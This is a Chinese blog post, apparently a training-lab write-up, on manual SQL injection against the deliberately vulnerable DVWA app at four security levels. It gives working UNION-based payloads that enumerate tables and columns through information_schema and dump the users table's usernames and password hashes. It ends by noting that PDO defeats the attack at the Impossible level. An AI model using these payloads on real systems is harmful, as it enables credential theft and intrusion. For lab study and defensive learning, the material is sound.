渗透测试实验_使用DVWA进行SQL手动注入 SQL手动注入的基本步骤 安全等级Low Medium High

最新推荐文章于 2024-05-12 12:01:50 发布
最新推荐文章于 2024-05-12 12:01:50 发布
阅读量6.2k 收藏 24
点赞数 6
分类专栏: 生产实习 文章标签: sql 数据库 web安全 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47133613/article/details/123578225
版权

文章目录

SQL手动注入

1. 前期数据准备

查看DVWA数据库的信息

  • 第一步:打开Windows2003虚拟机后,启动phpStudy
    在这里插入图片描述

  • 第二步:进入MySQL
    在这里插入图片描述

  • 第三步:查看数据库

  • 查看库名
    在这里插入图片描述

  • 选择数据库“dvwa”后,查看其中的表名
    在这里插入图片描述

  • 查看“dvwa“库中users表结构
    在这里插入图片描述

  • 查看users表中的username和password信息
    在这里插入图片描述

2. 前期实验准备

  • 第一步:先打开BurpSuite
    在这里插入图片描述
  • 第二步:再打开火狐浏览器的代理服务
    在这里插入图片描述
  • 第三步:在火狐浏览器中输入虚拟机IP,访问dvwa服务
    在这里插入图片描述

3. SQL手动注入的预备知识

以下内容引用自《sql手动注入常用步骤

原理
提起SQL注入,相信大家并不陌生,就是通过把SQL命令插入到Web表单提交输入域名页面请求查询字符串,最终达到欺骗服务器执行恶意的SQL命令,从而达到和服务器进行直接的交互。
有可能存在SQL注入的数据库类型可以是Mysql,Mssql,Oracle,Postgress等等

预备知识

  • 对MySQL数据库有一定了解;对基本的sql语句有所了解;
  • 对url编码有了解:空格=‘%20’,单引号=‘%27’,双引号=‘%22’,井号=‘%23’等

4. SQL手动注入的基本步骤

  1. 判断是什么类型注入,有没有过滤关键字,是否能绕过
  2. 确定存在注入的表的列数以及表中数据那些字段可以显示出来
  3. 获取数据库版本,用户,当前连接的数据库等信息
  4. 获取数据库中所有表的信息
  5. 获取某个表的列字段信息
  6. 获取相应表的数据

在这里插入图片描述
在这里插入图片描述

5. 实现SQL注入

  • 寻找SQL注入的方法
    在这里插入图片描述在这里插入图片描述在这里插入图片描述
  • SQL注入的危害
    在这里插入图片描述

6. Low等级

在这里插入图片描述

  • 选择“Low”安全等级,再点击“SQL Injection”
    在这里插入图片描述在这里插入图片描述

  • 判断注入类型
    首先测试正常数据

    • 简单ID查询的正常功能体验:输入正确的User ID(例如1,2,3…),点击Submit,将显示ID First name,Surname信息。
    • 输入错误的不显示
      在这里插入图片描述

  • 遍历数据库表,遍历出了数据库中所有内容。

    • 尝试在正常数据后加上单引号,发现数据为空,加上注释符(注释符:#,–+ , //, – )后发现依旧可以正常输出,存在注入点。看是否报错,如果数据库报错,说明后台数据库处理了我们输入的数据,那么有可能存在注入点。
1and1=1

在这里插入图片描述

1 and 1=2

在这里插入图片描述

  • 判断有几个字段
    • 在链接后面添加语句【 order by xx (数字任意)】,根据页面返回结果,来判断站点中的字段数目。
1order by 1 #

在这里插入图片描述

  • 联合查询显示位置
    • 在链接后面添加语句【 union select 1,2,3,4,5,6,7,8,9,10,11#】进行联合查询(联合查询时记得把前面的查询为空,“-1” )来暴露可查询的字段号。
1union select 1,2 #

在这里插入图片描述

  • 联合查询库名
    利用内置函数暴数据库信息
    version()版本;database()数据库;user()用户;
1union select version(),database() #

在这里插入图片描述

  • 联合查询表名
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #

在这里插入图片描述

  • 联合查询表里面的列名
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

在这里插入图片描述

  • 联合查询users里面的用户名和密码
1' union select user,password from users #

在这里插入图片描述在这里插入图片描述

7. Medium等级

  • 先打开BurpSuite的代理
    在这里插入图片描述在这里插入图片描述
  • 输入1提交,得到的报文发送给Repeater
    在这里插入图片描述在这里插入图片描述
  • 修改报文中的id=2
    在这里插入图片描述
id=2 union select 1,table_name from information_schema.tables wheretable_schema=(select database())#

在这里插入图片描述

8. High等级

  • 先关闭BurpSuite的代理
    在这里插入图片描述在这里插入图片描述

  • 输入1
    在这里插入图片描述

  • 遍历数据

1and1=2

在这里插入图片描述

  • 查询回显位置
1' union select 1,3 #

在这里插入图片描述

  • 查询dvwa库中的表名
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #

在这里插入图片描述

  • 查询数据库的版本号和当前连接的数据库名
1' union select version(),database() #

在这里插入图片描述

  • 查询dvwa库中users表的列名
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

在这里插入图片描述

  • 查询users表中user和password字段的数据
1' union select user,password from users #

在这里插入图片描述

9. Impossible等级

Impossible级别,代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入

  • 先关闭BurpSuite的代理,选择等级
    在这里插入图片描述

  • 输入1
    在这里插入图片描述

  • 判断注入类型,发现Impossible等级很难找到注入点

1 and 1=2
1and1=2

在这里插入图片描述在这里插入图片描述

  • 查询回显位置,发现无任何结果
1' union select 1,3 #

在这里插入图片描述

Outlook(^_^)
关注
  • 6
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA-SQL注入
WY92139010的博客
05-03 945
DVWA-SQL注入 一、SQL注入概念 SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 二、手工注入常规思路 1.判断是否存在注入注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 三、DVWA注入分...
DVWA-WEB漏洞系列之SQL注入
woo233的博客
08-09 3329
用户输入数据为 1’ and 1=1#,这时SQL语句发生变化,在原有查询完成后会判断 1=1,如果判断正确则才会有输出[#作用是注释(移除)后续SQL语句]在用户输入中依次增加order by后面的数据,当在输入为 1’ order by 3#时网页出现报错,证明该数据库有2列/字段。攻击者在HTTP请求中注入恶意的SQL代码,服务器使用参数构建数据库SQL命令时,恶意SQL被一起构造,并在数据库中执行。防御SQL注入使用PDO,配合正确的过滤和sql语句就可避免SQL注入漏洞的产生。...
利用dvwa靶场深度学习sql注入攻击
hcufo的博客
01-18 264
sql注入详细过程及总结
DVWA通过攻略之SQL注入_dvwa sql注入(1)
2401_84968303的博客
05-12 1141
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
DVWA通关详解初级
weixin_44831109的博客
03-16 1870
一、Brute Force(暴力破解)漏洞 (级别:low): 1.查看代码 可以看到,服务器只是验证了参数Login是否被设置,没有任何的防爆破机制 2.使用burpsuit抓包 3.单击Action发送到Intruder进行密码爆破 4.先清除 ,然后选中要爆破字段,点击添加 5.设置Payloads 6.点击右上角开始攻击 7.成功爆破 测试过程(级别:medium): 1.查看代码 从源码可以看到,与初级相比多出了红框框的内容,就是对一些特殊字符进行了转义还是与初级一样进行爆破
网络渗透测试实验3:SQL注入DVWA+SQLmap+Mysql注入实战)
zzzfff__的博客
11-21 1722
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
软件安全实验2 SQL注入实验
最新发布
06-19
1、借助Web漏洞教学和演练的开源免费工具DVWA,学习了解Web漏洞的原理及利用。 2、 DVWA(Damn Vulnerable Web Application)是一款用PHP+MySQL编写的...DVWA中将代码分为4种安全级别:LowMediumHigh、Impossible。
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,LowMediumHigh 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
dvwa靶场训练.rar
03-17
DVWA分为多个安全级别,包括"Low"、"Medium"、"High"和"Impossible",每个级别下都有不同的漏洞类型,如SQL注入、XSS(跨站脚本)、CSRF(跨站请求伪造)等。这些漏洞在现实世界中非常常见,掌握它们的识别和利用...
web安全dvwa.rar
08-04
dvwa用于初学者sql注入的靶场练习环境。下载后解压到phpstudy_pro/www/下,然后本地(localhost)访问,dvwaLow/Medium/Hight/Inpossible四个等级,分别对应不同的级别,初学者建议使用Low级别。
DVWA 共12关通关笔记
09-12
DVWA分为多个级别,从低到高分别是易(Low)、中(Medium)、难(Hard)和地狱(Impossible),涵盖了SQL注入、跨站脚本(XSS)、文件包含、命令注入等常见攻击手段。 1. **SQL注入**: 在DVWASQL注入关卡中,...
DVWA练习——sql注入
haoaaao的博客
01-30 2603
一、sql injection (1)由于dvwa需要登录,因此直接无法获取数据库的内容,则需要在sql注入语句中添加网站的cookie以绕过登录 获取cookie: (2)sqlmap获取数据库: python sqlmap.py -u "http://127.0.0.1:8082/vulnerabilities/sqli/?id=4354&Submit=Submit" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; securit..
DVWASQL注入
leo788的博客
07-26 322
使用sqlmap在dvwa进行简单的sql注入实验
DvwaSQL 注入全级别学习笔记
Mbys_Lettuce的博客
09-15 1026
SQL注入web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过不同的条件产生不同的SQL语句,这是学习dvwasql注入的相关笔记。仅供学习。 ​
DVWAlow级别sql注入
weixin_30349597的博客
07-13 371
将Security level设为low,在左侧列表中选择“SQL Injection”,然后在右侧的“User ID”文本框中输入不同的数字就会显示相应的用户信息。 我们首先需要判断这里所传输的参数是文本型还是数字型,分别输入3和1+2,观察它们显示的结果并不一致,因而就判断出参数类型是文本型 接下来用sqlmap注入 ,比较简单,不过要抓包抓cookie,因为这个是登陆后的...
DVWA手动SQL注入
weixin_36992674的博客
03-29 611
DVWA手动SQL注入 首先需要揣测这个sql语句是怎么写的,输入一个合法的id:1 .观察这里输出的信息 这里还需要判断select里有几个位置,所以我们用order by 进行尝试——输入1’ order by 5 –(注意这里–是两个-,而且最后面要加一个空格表示注释,没有空格是不生效的哟),最前面的'用来闭合单引号,最后面的--用来注释掉最后面的单引号 返回结果 再继续尝试3,2,发
DVWA SQL注入
m0_55605024的博客
03-01 496
简而言之,是在输入字符串之中注入SQL指令,在设计不良的程序当中忽略了字符检查,那么这些。如:将'dvwa'替换为database() or 替换为0x64767761(将'dvwa'进行16进制编码)2.安装kali操作系统,kali自带sqlmap,可以直接输入sqlmap执行。注入进去的恶意指令就会被数据库误以为是正常的SQL指令而运行。--dbs:database serve 获取所有的数据库名。database():返回当前数据库的名称。防御命令执行的最高效的方法,就是。
Sqlmap
mumuzi2的博客
02-25 386
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
Kali渗透测试(九)——DVWA SQL 注入
Bulldozer_GD的博客
07-16 589
Kali渗透测试(九)——DVWASQL注入 一. 低级别,没有对用户输入做任何限制,提及的数据直接拼接。 1. 查询所有数据库 2. 查询dvwa库中的表名 查询字段名 4. 查询用户名密码 5.也可以进行操作系统级别的命令执行 6.无权读取information_schema ,拒绝 union/order by 时: 猜列名:利用burpsuite Intruder 和字典文件 ' and column is null--猜表名 ' and table.user is n
dvwa靶机sql注入
08-04
DVWA靶机中的SQL注入是一种安全漏洞,攻击者可以通过构造恶意的SQL语句来绕过应用程序的验证和过滤机制,从而获取未授权的访问权限或者获取敏感信息。根据引用[1]和引用[2]中提到的内容,DVWA靶机中的SQL注入分为不同的安全级别,包括LowMediumHigh和Blind注入。 在Low级别的SQL注入中,攻击者可以通过在输入框中输入特定的SQL语句来绕过应用程序的验证,从而执行恶意操作。在Medium级别的SQL注入中,应用程序对输入进行了一定的过滤,但仍存在一些漏洞可以被攻击者利用。在High级别的SQL注入中,应用程序对输入进行了更严格的过滤,但仍然存在一些漏洞可以被攻击者利用。 在Blind注入中,攻击者无法直接获取注入结果,但可以通过构造特定的SQL语句来判断条件是否成立,从而获取敏感信息。Blind注入可以分为不同的级别,包括LowMediumHigh级别。 为了进行SQL注入攻击,攻击者可以使用手工方法或者工具如sqlmap。手工方法需要攻击者具备一定的SQL注入知识和技巧,而工具如sqlmap可以自动化执行注入攻击,提高攻击效率。 为了防御SQL注入攻击,开发人员应该对用户输入进行严格的验证和过滤,使用参数化查询或预编译语句来防止SQL注入攻击。此外,还可以限制数据库用户的权限,避免敏感信息的泄露。 根据引用[3]中的结论,可以通过使用sqlmap工具来获取DVWA靶机中的数据库名和表名。具体的命令可以参考引用[3]中提供的示例。 总之,DVWA靶机中的SQL注入是一种常见的安全漏洞,攻击者可以通过构造恶意的SQL语句来绕过应用程序的验证和过滤机制,获取未授权的访问权限或者敏感信息。开发人员应该采取相应的防御措施来保护应用程序的安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值